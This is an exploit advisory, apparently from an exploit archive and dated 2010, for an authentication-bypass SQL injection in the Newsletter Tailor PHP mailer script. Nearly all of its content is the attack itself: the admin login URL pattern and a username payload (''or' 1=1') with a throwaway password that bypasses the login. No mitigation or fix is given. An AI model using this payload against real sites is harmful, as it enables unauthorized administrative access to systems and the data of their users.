id: 10804
date: 02/09/2010
title: Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
author: ViRuSMaN
cves: 

===========================================================
Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
===========================================================


==============================================================================
[»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
[»] Newsletter Tailor (Auth Bypass) SQL Injection Vulnerability
==============================================================================
 
[»] Script: [ Newsletter Tailor ]
[»] Language: [ PHP ]
[»] Site page: [ A powerful Newsletter/ Mass Mailer script with built-in ftp client and wysiwyg editor ]
[»] Download: [ http://sourceforge.net/projects/nlettertailor/ ]
[»] Founder: [ ViRuSMaN ]
 
###########################################################################
 
===[ Exploit ]===
 
[»] http://[target].com/[path]/admin/
[~] Username:'or' 1=1
[~] Password:ViRuSMaN
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-25]  #